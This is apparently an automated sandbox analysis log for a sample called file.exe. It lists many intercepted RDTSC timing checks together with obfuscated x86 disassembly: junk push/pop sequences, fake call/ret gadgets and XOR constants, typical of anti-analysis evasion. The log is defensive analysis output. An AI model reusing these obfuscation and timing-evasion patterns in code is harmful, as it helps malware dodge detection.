Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4B7E7 second address: A4B7EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4B8C3 second address: A4B8C9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4B8C9 second address: A4B927 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FDE8CE8B4CAh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 293C2647h 0x00000012 mov dx, ax 0x00000015 push 00000003h 0x00000017 mov ecx, dword ptr [ebp+122D2C53h] 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push esi 0x00000022 call 00007FDE8CE8B4C8h 0x00000027 pop esi 0x00000028 mov dword ptr [esp+04h], esi 0x0000002c add dword ptr [esp+04h], 00000016h 0x00000034 inc esi 0x00000035 push esi 0x00000036 ret 0x00000037 pop esi 0x00000038 ret 0x00000039 movzx ecx, di 0x0000003c push 00000003h 0x0000003e mov dx, A3DAh 0x00000042 call 00007FDE8CE8B4C9h 0x00000047 push eax 0x00000048 push edx 0x00000049 js 00007FDE8CE8B4CCh 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4B927 second address: A4B92B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4B92B second address: A4B949 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FDE8CE8B4CBh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push ebx 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4B949 second address: A4B959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4B959 second address: A4B9A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007FDE8CE8B4CDh 0x00000012 pop eax 0x00000013 lea ebx, dword ptr [ebp+12450591h] 0x00000019 mov dword ptr [ebp+122D2A94h], edx 0x0000001f xchg eax, ebx 0x00000020 jmp 00007FDE8CE8B4D4h 0x00000025 push eax 0x00000026 pushad 0x00000027 push ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4BA32 second address: A4BA98 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDE8C51D4D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b add dword ptr [esp], 0C01D331h 0x00000012 adc edi, 4D17B527h 0x00000018 push 00000003h 0x0000001a mov si, ax 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ecx 0x00000022 call 00007FDE8C51D4D8h 0x00000027 pop ecx 0x00000028 mov dword ptr [esp+04h], ecx 0x0000002c add dword ptr [esp+04h], 00000018h 0x00000034 inc ecx 0x00000035 push ecx 0x00000036 ret 0x00000037 pop ecx 0x00000038 ret 0x00000039 jmp 00007FDE8C51D4DAh 0x0000003e push 00000003h 0x00000040 push edx 0x00000041 add di, 19D3h 0x00000046 pop ecx 0x00000047 mov dword ptr [ebp+122D1C44h], ecx 0x0000004d push 495446F9h 0x00000052 jo 00007FDE8C51D4EBh 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4BA98 second address: A4BAC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8CE8B4CDh 0x00000009 popad 0x0000000a add dword ptr [esp], 76ABB907h 0x00000011 lea ebx, dword ptr [ebp+1245059Ch] 0x00000017 mov edi, dword ptr [ebp+122D2DDFh] 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jng 00007FDE8CE8B4C8h 0x00000026 push edx 0x00000027 pop edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4BAC8 second address: A4BACE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4BACE second address: A4BAD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5C733 second address: A5C738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A68F7F second address: A68F85 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A690FE second address: A69103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A69292 second address: A692C5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDE8CE8B4C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FDE8CE8B4D0h 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FDE8CE8B4CFh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A692C5 second address: A692DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FDE8C51D4E5h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6946B second address: A69471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A69471 second address: A69477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A69A14 second address: A69A34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007FDE8CE8B4C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDE8CE8B4D2h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A69A34 second address: A69A38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A69BEA second address: A69BF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A69BF2 second address: A69C12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007FDE8C51D4E6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A69E7B second address: A69E8A instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDE8CE8B4C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A69E8A second address: A69E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A69E91 second address: A69E96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A69E96 second address: A69EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8C51D4E4h 0x00000009 js 00007FDE8C51D4D6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A69EB9 second address: A69EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6A019 second address: A6A022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6A022 second address: A6A026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A38AC4 second address: A38AD0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jno 00007FDE8C51D4D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A38AD0 second address: A38AEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDE8CE8B4D8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6A960 second address: A6A968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6A968 second address: A6A977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jo 00007FDE8CE8B4CCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6AC03 second address: A6AC09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6AC09 second address: A6AC15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FDE8CE8B4C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6AC15 second address: A6AC21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FDE8C51D4D6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A71D0E second address: A71D18 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDE8CE8B4CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A75069 second address: A7508C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007FDE8C51D4D6h 0x0000000c jmp 00007FDE8C51D4E6h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7508C second address: A75096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FDE8CE8B4C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A75096 second address: A750E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jg 00007FDE8C51D4D6h 0x00000010 jmp 00007FDE8C51D4E9h 0x00000015 pop ebx 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d push edi 0x0000001e pop edi 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A750E0 second address: A750E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A750E4 second address: A750EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A750EA second address: A750F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FDE8CE8B4C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A750F4 second address: A750F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7596B second address: A75991 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnl 00007FDE8CE8B4C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jmp 00007FDE8CE8B4D8h 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3C058 second address: A3C05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3C05E second address: A3C064 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3C064 second address: A3C069 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7B05D second address: A7B061 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7BE13 second address: A7BE17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7C47E second address: A7C488 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDE8CE8B4C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7C637 second address: A7C63B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7C63B second address: A7C641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7CD67 second address: A7CD6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7E00D second address: A7E02C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8CE8B4D6h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7E02C second address: A7E030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7F34D second address: A7F362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8CE8B4CCh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7FE1C second address: A7FE7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FDE8C51D4EDh 0x0000000b jmp 00007FDE8C51D4E7h 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007FDE8C51D4D8h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e push 00000000h 0x00000030 jmp 00007FDE8C51D4E1h 0x00000035 push 00000000h 0x00000037 xchg eax, ebx 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A80836 second address: A80856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FDE8CE8B4D4h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A80856 second address: A8085B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8085B second address: A80866 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FDE8CE8B4C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7FBEA second address: A7FBF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7FBF0 second address: A7FBFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FDE8CE8B4C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7FBFB second address: A7FC07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A85173 second address: A85179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A85C75 second address: A85C84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE8C51D4DBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A88295 second address: A88301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FDE8CE8B4C8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 jmp 00007FDE8CE8B4CCh 0x00000027 sbb bx, 0ED0h 0x0000002c push 00000000h 0x0000002e mov dword ptr [ebp+122D2A94h], eax 0x00000034 push 00000000h 0x00000036 mov edi, dword ptr [ebp+1247340Eh] 0x0000003c xor edi, 773260E7h 0x00000042 xchg eax, esi 0x00000043 jmp 00007FDE8CE8B4CFh 0x00000048 push eax 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FDE8CE8B4CAh 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A86359 second address: A8635D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8635D second address: A8637C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDE8CE8B4CCh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jnc 00007FDE8CE8B4C6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8A567 second address: A8A56B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8637C second address: A86381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8B286 second address: A8B29F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDE8C51D4DFh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A86381 second address: A86387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8B29F second address: A8B346 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 movsx edi, ax 0x0000000c mov dword ptr [ebp+122D2802h], edx 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007FDE8C51D4D8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e call 00007FDE8C51D4E9h 0x00000033 sub dword ptr [ebp+122D1DFDh], ecx 0x00000039 pop ebx 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push eax 0x0000003f call 00007FDE8C51D4D8h 0x00000044 pop eax 0x00000045 mov dword ptr [esp+04h], eax 0x00000049 add dword ptr [esp+04h], 0000001Ch 0x00000051 inc eax 0x00000052 push eax 0x00000053 ret 0x00000054 pop eax 0x00000055 ret 0x00000056 mov ebx, 4E015CD1h 0x0000005b push eax 0x0000005c pushad 0x0000005d pushad 0x0000005e jns 00007FDE8C51D4D6h 0x00000064 jl 00007FDE8C51D4D6h 0x0000006a popad 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007FDE8C51D4E8h 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8D278 second address: A8D299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8CE8B4CBh 0x00000009 jnp 00007FDE8CE8B4D2h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3A521 second address: A3A525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3A525 second address: A3A52F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDE8CE8B4C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8D86D second address: A8D8F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FDE8C51D4D6h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007FDE8C51D4D8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007FDE8C51D4D8h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 0000001Ch 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 push 00000000h 0x00000047 jnl 00007FDE8C51D4DCh 0x0000004d pushad 0x0000004e jmp 00007FDE8C51D4DEh 0x00000053 pushad 0x00000054 sub ecx, dword ptr [ebp+122D2D07h] 0x0000005a jbe 00007FDE8C51D4D6h 0x00000060 popad 0x00000061 popad 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 push edx 0x00000067 pop edx 0x00000068 jno 00007FDE8C51D4D6h 0x0000006e popad 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E8D4 second address: A8E8D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E8D8 second address: A8E8DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E8DE second address: A8E951 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FDE8CE8B4D3h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007FDE8CE8B4C8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 mov edi, dword ptr [ebp+122D1F62h] 0x0000002e mov di, ax 0x00000031 push 00000000h 0x00000033 mov edi, 062440A7h 0x00000038 push 00000000h 0x0000003a jnc 00007FDE8CE8B4CCh 0x00000040 xchg eax, esi 0x00000041 jmp 00007FDE8CE8B4D6h 0x00000046 push eax 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a push ecx 0x0000004b pop ecx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8F876 second address: A8F87B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8EABB second address: A8EABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
